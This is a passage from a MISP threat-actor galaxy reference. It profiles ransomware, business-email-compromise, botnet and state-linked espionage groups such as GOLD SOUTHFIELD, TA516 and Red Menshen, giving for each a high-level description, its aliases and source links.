On May 7, 2019, Mayor Bernard “Jack” Young confirmed via Twitter that the network of the U.S. City of Baltimore (CoB) was infected with ransomware. This infection was later confirmed to have been conducted by OUTLAW SPIDER, the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems, to recover the city’s files.

The tag is: misp-galaxy:threat-actor="OUTLAW SPIDER"

Table 12072. Table References

Links

https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeServicesCyberFrontLines.pdf

MIMIC SPIDER

MIMIC SPIDER is mentioned in two summary reports only.

The tag is: misp-galaxy:threat-actor="MIMIC SPIDER"

Table 12073. Table References

Links

https://conferences.law.stanford.edu/cyberday/wp-content/uploads/sites/10/2016/10/2a_15GlobalThreatReport_Extracted.pdf

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

HOUND SPIDER

According to CrowdStrike, HOUND SPIDER affiliates were arrested in Romania in December 2017.

The tag is: misp-galaxy:threat-actor="HOUND SPIDER"

Table 12074. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

GOLD BURLAP

GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).

The tag is: misp-galaxy:threat-actor="GOLD BURLAP"

GOLD BURLAP is also known as:

  • CYBORG SPIDER

GOLD BURLAP has relationships with:

  • uses: misp-galaxy:malpedia="Mespinoza" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:malpedia="MimiKatz" with estimative-language:likelihood-probability="very-likely"

Table 12075. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf

GOLD CABIN

GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial-appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.

The tag is: misp-galaxy:threat-actor="GOLD CABIN"

GOLD CABIN is also known as:

  • Shakthak

  • TA551

  • ATK236

  • G0127

  • Monster Libra

Table 12076. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-cabin

https://attack.mitre.org/groups/G0127/

https://unit42.paloaltonetworks.com/atoms/monsterlibra/

GOLD FAIRFAX

GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').

The tag is: misp-galaxy:threat-actor="GOLD FAIRFAX"

Table 12077. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-fairfax

GOLD FLANDERS

GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDoS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDoS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes, targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.

The tag is: misp-galaxy:threat-actor="GOLD FLANDERS"

Table 12078. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-flanders

GOLD GALLEON

GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.

The tag is: misp-galaxy:threat-actor="GOLD GALLEON"

Table 12079. Table References

Links

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

http://www.secureworks.com/research/threat-profiles/gold-galleon

GOLD GARDEN

GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced, for unknown reasons, that they had halted operations with no intent to resume. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD, who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.

The tag is: misp-galaxy:threat-actor="GOLD GARDEN"

Table 12080. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-garden

GOLD MANSARD

GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.

The tag is: misp-galaxy:threat-actor="GOLD MANSARD"

Table 12081. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-mansard

GOLD NORTHFIELD

Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD’s REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.

The tag is: misp-galaxy:threat-actor="GOLD NORTHFIELD"

Table 12082. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-northfield

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-13th-2020-extortion-gone-wild/

GOLD RIVERVIEW

GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN, who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE’s Dridex (Bugat v5), GOLD BLACKBURN’s TrickBot, and other families like Locky and FlawedAmmy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and took technical steps that would complicate the threat actors' ability to reconstitute the botnet.

The tag is: misp-galaxy:threat-actor="GOLD RIVERVIEW"

Table 12083. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-riverview

GOLD SKYLINE

GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.

The tag is: misp-galaxy:threat-actor="GOLD SKYLINE"

Table 12084. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-skyline

GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated cybercriminal threat group that authors and operates the REvil (aka Sodinokibi) ransomware on behalf of various affiliated threat groups. Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. GOLD SOUTHFIELD is responsible for authoring REvil and operating the backend infrastructure used by affiliates (also called partners) to create malware builds and to collect ransom payments from victims. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates.

The tag is: misp-galaxy:threat-actor="GOLD SOUTHFIELD"

Table 12085. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-southfield

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

https://www.secureworks.com/blog/revil-the-gandcrab-connection

GOLD SYMPHONY

GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as malware-as-a-service (MaaS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.

The tag is: misp-galaxy:threat-actor="GOLD SYMPHONY"

Table 12086. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-symphony

GOLD WATERFALL

GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims' remote access services. In November 2020, the 'darksupp' persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL’s entry into the ransomware-as-a-service (RaaS) landscape.

The tag is: misp-galaxy:threat-actor="GOLD WATERFALL"

Table 12087. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-waterfall

https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access

GOLD WINTER

GOLD WINTER are a financially motivated group, likely based in Russia, who operate the Hades ransomware. Hades activity was first identified in December 2020 and its lack of presence on underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware as a service affiliate model. GOLD WINTER do employ name-and-shame tactics, where data is stolen and used as additional leverage over victims, but rather than a single centralized leak site CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique for each victim.

The tag is: misp-galaxy:threat-actor="GOLD WINTER"

Table 12088. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-winter

BackdoorDiplomacy

An APT group that we are calling BackdoorDiplomacy, due to the main vertical of its victims, has been targeting Ministries of Foreign Affairs and telecommunication companies in Africa and the Middle East since at least 2017.

The tag is: misp-galaxy:threat-actor="BackdoorDiplomacy"

BackdoorDiplomacy is also known as:

  • BackDip

  • CloudComputating

  • Quarian

Table 12089. Table References

Links

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Gelsemium

The Gelsemium group has been active since at least 2014 and was described in the past by a few security companies. Gelsemium’s name comes from one possible translation ESET found while reading a report from VenusTech, who dubbed the group 狼毒草 for the first time. It is the name of a genus of flowering plants belonging to the family Gelsemiaceae; Gelsemium elegans is the species that contains toxic compounds like Gelsemine, Gelsenicine and Gelsevirine, which ESET chose as names for the three components of this malware family.

The tag is: misp-galaxy:threat-actor="Gelsemium"

Gelsemium is also known as:

  • 狼毒草

Table 12090. Table References

Links

https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/

https://www.venustech.com.cn/uploads/2018/08/231401512426.pdf

https://hitcon.org/2016/pacific/0composition/pdf/1202/1202%20R0%200930%20an%20intelligance-driven%20approach%20to%20cyber%20defense.pdf

https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf

BelialDemon

Mentioned as operator of TriumphLoader and Matanbuchus

The tag is: misp-galaxy:threat-actor="BelialDemon"

BelialDemon is also known as:

  • Matanbuchus

Table 12091. Table References

Links

https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

Common Raven

Threat actor Common Raven has been actively targeting financial sector institutions, compromising their SWIFT payment infrastructure to send out fraudulent payments.

The tag is: misp-galaxy:threat-actor="Common Raven"

Common Raven is also known as:

  • OPERA1ER

  • NXSMS

  • DESKTOP-GROUP

Table 12092. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs

https://www2.swift.com/isac/report/10118

https://blog.group-ib.com/opera1er-apt

FIN13

Since 2017, Mandiant has been tracking FIN13, an industrious and versatile financially motivated threat actor conducting long-term intrusions in Mexico with an activity timeframe stretching back as early as 2016. Although their operations continue through the present day, in many ways FIN13’s intrusions are like a time capsule of traditional financial cybercrime from days past. Instead of today’s prevalent smash-and-grab ransomware groups, FIN13 takes their time to gather information to perform fraudulent money transfers. Rather than relying heavily on attack frameworks such as Cobalt Strike, the majority of FIN13 intrusions involve heavy use of custom passive backdoors and tools to lurk in environments for the long haul.

The tag is: misp-galaxy:threat-actor="FIN13"

FIN13 is also known as:

  • TG2003

  • Elephant Beetle

Table 12093. Table References

Links

https://www.mandiant.com/resources/fin13-cybercriminal-mexico

https://blog.sygnia.co/elephant-beetle-an-organized-financial-theft-operation

https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf

https://www.netwitness.com/wp-content/uploads/FIN13-Elephant-Beetle-NetWitness.pdf

SideCopy

The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.

The tag is: misp-galaxy:threat-actor="SideCopy"

Table 12094. Table References

Links

https://www.seqrite.com/blog/operation-sidecopy/

https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/

https://www.telsy.com/sidecopy-apt-from-windows-to-nix/

https://blog.talosintelligence.com/2021/07/sidecopy.html

https://about.fb.com/news/2021/11/taking-action-against-hackers-in-pakistan-and-syria/

https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d

Antlion

Antlion is a Chinese state-backed advanced persistent threat (APT) group that has been targeting financial institutions in Taiwan. This persistent campaign has lasted over the course of at least 18 months.

The tag is: misp-galaxy:threat-actor="Antlion"

Table 12095. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks

TA2541

Persistent cybercrime threat actor targeting aviation, aerospace, transportation, manufacturing, and defense industries for years. This threat actor consistently uses remote access trojans (RATs) that can be used to remotely control compromised machines. This threat actor uses consistent themes related to aviation, transportation, and travel. The threat actor has used similar themes and targeting since 2017.

The tag is: misp-galaxy:threat-actor="TA2541"

Table 12096. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

TA516

This actor typically distributes instances of the SmokeLoader intermediate downloader, which, in turn, downloads additional malware of the actor’s choice — often banking Trojans. Figure 3 shows a lure document from a November campaign in which TA516 distributed fake resumes with malicious macros that, if enabled, launch a PowerShell script that downloads SmokeLoader. In this instance, we observed SmokeLoader downloading a Monero coinminer. Since the middle of 2017, TA516 has used similar macro-laden documents as well as malicious JavaScript hosted on Google Drive to distribute both Panda Banker and a coinminer executable via SmokeLoader, often in the same campaigns.

The tag is: misp-galaxy:threat-actor="TA516"

Table 12097. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA547

TA547 is responsible for many other campaigns since at least November 2017. The other campaigns by the actor were often localized to countries such as Australia, Germany, the United Kingdom, and Italy. Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.

The tag is: misp-galaxy:threat-actor="TA547"

Table 12098. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA554

Since May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries. While initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named TA554) since at least the beginning of 2017.

The tag is: misp-galaxy:threat-actor="TA554"

TA554 is also known as:

  • TH-163

Table 12099. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA555

Beginning in May 2018, Proofpoint researchers observed a previously undocumented downloader dubbed AdvisorsBot appearing in malicious email campaigns. The campaigns appear to primarily target hotels, restaurants, and telecommunications, and are distributed by an actor we track as TA555. To date, we have observed AdvisorsBot used as a first-stage payload, loading a fingerprinting module that, as with Marap, is presumably used to identify targets of interest to further infect with additional modules or payloads. AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.

The tag is: misp-galaxy:threat-actor="TA555"

Table 12100. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA800

This attacker is an affiliate distributor of The Trick, also known as Trickbot, and BazaLoader. (For more on how affiliates work, see the description of TA573.) TA800 has targeted a wide range of industries in North America, infecting victims with banking Trojans and malware loaders (malware designed to download other malware onto a compromised device). Malicious emails have often included recipients’ names, titles and employers along with phishing pages designed to look like the targeted company. Lures have included hard-to-resist subjects related to payment, meetings, termination, bonuses and complaints in the subject line or body of the email.

The tag is: misp-galaxy:threat-actor="TA800"

Table 12101. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes

MosesStaff

Cybereason Nocturnus describes Moses Staff as an Iranian hacker group, first spotted in October 2021. Their motivation appears to be to harm Israeli companies by leaking sensitive, stolen data.

The tag is: misp-galaxy:threat-actor="MosesStaff"

MosesStaff is also known as:

  • Moses Staff

  • Marigold Sandstorm

  • DEV-0500

MosesStaff has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Marigold Sandstorm" with estimative-language:likelihood-probability="likely"

Table 12102. Table References

Links

https://twitter.com/campuscodi/status/1450455259202166799

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard

Avivore

The group’s existence came to light during Context’s investigation of a number of attacks against multinational enterprises that compromise smaller engineering services and consultancies working in their supply chains.

The tag is: misp-galaxy:threat-actor="Avivore"

Table 12103. Table References

Links

https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers

https://www.contextis.com/en/news/context-identifies-new-avivore-threat-group

https://web.archive.org/web/20191208223958/https://www.contextis.com/en/blog/avivore

HAZY TIGER

The Bitter threat group initially started using RAT tools in their campaigns, as the first Bitter versions, released for Android in 2014, were based on the AndroRAT framework. Over time, they switched to a custom version that has been known as BitterRAT ever since.

The tag is: misp-galaxy:threat-actor="HAZY TIGER"

HAZY TIGER is also known as:

  • Bitter

  • T-APT-17

  • APT-C-08

  • Orange Yali

Table 12104. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf

https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

LAPSUS

An actor group conducting large-scale social engineering and extortion campaigns against multiple organizations, with some seeing evidence of destructive elements.

The tag is: misp-galaxy:threat-actor="LAPSUS"

LAPSUS is also known as:

  • LAPSUS$

  • DEV-0537

  • SLIPPY SPIDER

  • Strawberry Tempest

LAPSUS has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Strawberry Tempest" with estimative-language:likelihood-probability="likely"

Table 12105. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

https://blog.checkpoint.com/2022/03/07/lapsus-ransomware-gang-uses-stolen-source-code-to-disguise-malware-files-as-trustworthy-check-point-customers-remain-protected/

https://www.crowdstrike.com/adversaries/slippy-spider/

Scarab

Scarab APT was first spotted in 2015, but is believed to have been active since at least 2012, conducting surgical attacks against a small number of individuals across the world, including Russia and the United States. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

The tag is: misp-galaxy:threat-actor="Scarab"

Table 12106. Table References

Links

https://web.archive.org/web/20150124025612/http://www.symantec.com:80/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012

https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine

Copy-Paste

The title ‘Copy-paste compromises’, given by the Australian Government, is derived from the actor’s heavy use of tools copied almost identically from open source.

The tag is: misp-galaxy:threat-actor="Copy-Paste"

Table 12108. Table References

Links

https://www.cyber.gov.au/acsc/view-all-content/alerts/copy-paste-compromises

https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks

Killnet

A group targeting various countries using Denial of Service attacks.

The tag is: misp-galaxy:threat-actor="Killnet"

Table 12109. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://therecord.media/russia-or-ukraine-hacking-groups-take-sides/?msclkid=235244a7ba6611ec92f21c9bd3b8ee49

https://www.expats.cz/czech-news/article/pro-russian-hackers-target-czech-websites-in-a-series-of-attacks

UNC3524

Mandiant observed this group operating since December 2019. Its techniques partially overlap with multiple Russian-based espionage actors (APT28 and APT29). They are described as having a high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet at their disposal.

The tag is: misp-galaxy:threat-actor="UNC3524"

Table 12111. Table References

Links

https://www.mandiant.com/resources/unc3524-eye-spy-email

Curious Gorge

Curious Gorge, a group TAG attributes to China’s PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia. The actor has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs. Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.

The tag is: misp-galaxy:threat-actor="Curious Gorge"

Curious Gorge is also known as:

  • UNC3742

Table 12112. Table References

Links

https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe

https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

Red Menshen

Red Menshen is a China-based threat actor that, since 2021, has been observed targeting telecommunications providers across the Middle East and Asia, as well as entities in the government, education, and logistics sectors, using a custom backdoor referred to as BPFDoor. This threat actor uses a variety of tools in its post-exploitation phase. These include custom variants of the shared tool Mangzamel (including Golang variants), custom variants of Gh0st, and open source tools like Mimikatz and Metasploit to aid in its lateral movement across Windows systems. They have also been seen sending commands to BPFDoor victims via Virtual Private Servers (VPSs) hosted at a well-known provider; these VPSs, in turn, are administered via compromised routers based in Taiwan, which the threat actor uses as VPN tunnels. Most Red Menshen activity that has been observed took place between Monday and Friday (with none observed on the weekends), with most communication taking place between 01:00 and 10:00 UTC. This pattern suggests a consistent 8 to 9-hour activity window for the threat actor, with a realistic probability of it aligning to local working hours.

The tag is: misp-galaxy:threat-actor="Red Menshen"

Red Menshen is also known as:

  • Red Dev 18

Table 12113. Table References

Links

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://troopers.de/troopers22/talks/7cv8pz

Cosmic Lynx

Cosmic Lynx is a Russia-based BEC cybercriminal organization that has significantly impacted the email threat landscape with sophisticated, high-dollar phishing attacks.

The tag is: misp-galaxy:threat-actor="Cosmic Lynx"

Table 12114. Table References

Links

https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf

ModifiedElephant

Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.

The tag is: misp-galaxy:threat-actor="ModifiedElephant"

Table 12115. Table References

Links

https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

EXOTIC LILY

EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and the deployment of human-operated ransomware such as Conti and Diavol. In early September 2021, the group was observed exploiting a 0-day in Microsoft MSHTML (CVE-2021-40444). The investigation led researchers to believe that they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike). This threat actor deploys tactics, techniques and procedures (TTPs) that are traditionally associated with more targeted attacks, such as spoofing companies and employees as a means of gaining the trust of a targeted organization through email campaigns that are believed to be sent by real human operators using little to no automation. Additionally, and rather uniquely, they leverage legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver the payload, namely BUMBLEBEE and BAZARLOADER, further evading detection mechanisms. This level of human interaction is rather unusual for cyber crime groups focused on mass-scale operations.

The tag is: misp-galaxy:threat-actor="EXOTIC LILY"

EXOTIC LILY is also known as:

  • DEV-0413

Table 12116. Table References

Links

https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

TA578

TA578 is a threat actor that Proofpoint researchers have been tracking since May 2020. TA578 has previously been observed in email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, and Cobalt Strike.

The tag is: misp-galaxy:threat-actor="TA578"

Table 12117. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

TA579

TA579 is a threat actor that Proofpoint researchers have been tracking since August 2021. The actor frequently delivered BazaLoader and IcedID in past campaigns.

The tag is: misp-galaxy:threat-actor="TA579"

Table 12118. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

RansomHouse

This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.

The tag is: misp-galaxy:threat-actor="RansomHouse"

Table 12119. Table References

Links

https://webz.io/dwp/new-ransomware-group-ransomhouse-is-it-real-or-fake/

ToddyCat

ToddyCat is responsible for multiple sets of attacks detected since December 2020 against high-profile entities in Europe and Asia. There is still little information about this actor, but its main distinctive signs are two formerly unknown tools that Kaspersky calls ‘Samurai backdoor’ and ‘Ninja Trojan’.

The tag is: misp-galaxy:threat-actor="ToddyCat"

ToddyCat is also known as:

  • Websiic

Table 12120. Table References

Links

https://www.bleepingcomputer.com/news/security/new-toddycat-apt-group-targets-exchange-servers-in-asia-europe/

https://securelist.com/toddycat/106799/

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html

https://community.riskiq.com/article/d8b749f2

https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/

POLONIUM

Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM.

The tag is: misp-galaxy:threat-actor="POLONIUM"

POLONIUM is also known as:

  • Plaid Rain

  • UNC4453

  • GREATRIFT

POLONIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Plaid Rain" with estimative-language:likelihood-probability="likely"

Table 12121. Table References

Links

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

https://www.deepinstinct.com/blog/polonium-apt-group-uncovering-new-elements

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

Predatory Sparrow

A self-proclaimed hacktivist group that carried out attacks against Iranian railway systems and against Iranian steel plants.

The tag is: misp-galaxy:threat-actor="Predatory Sparrow"

Predatory Sparrow is also known as:

  • Indra

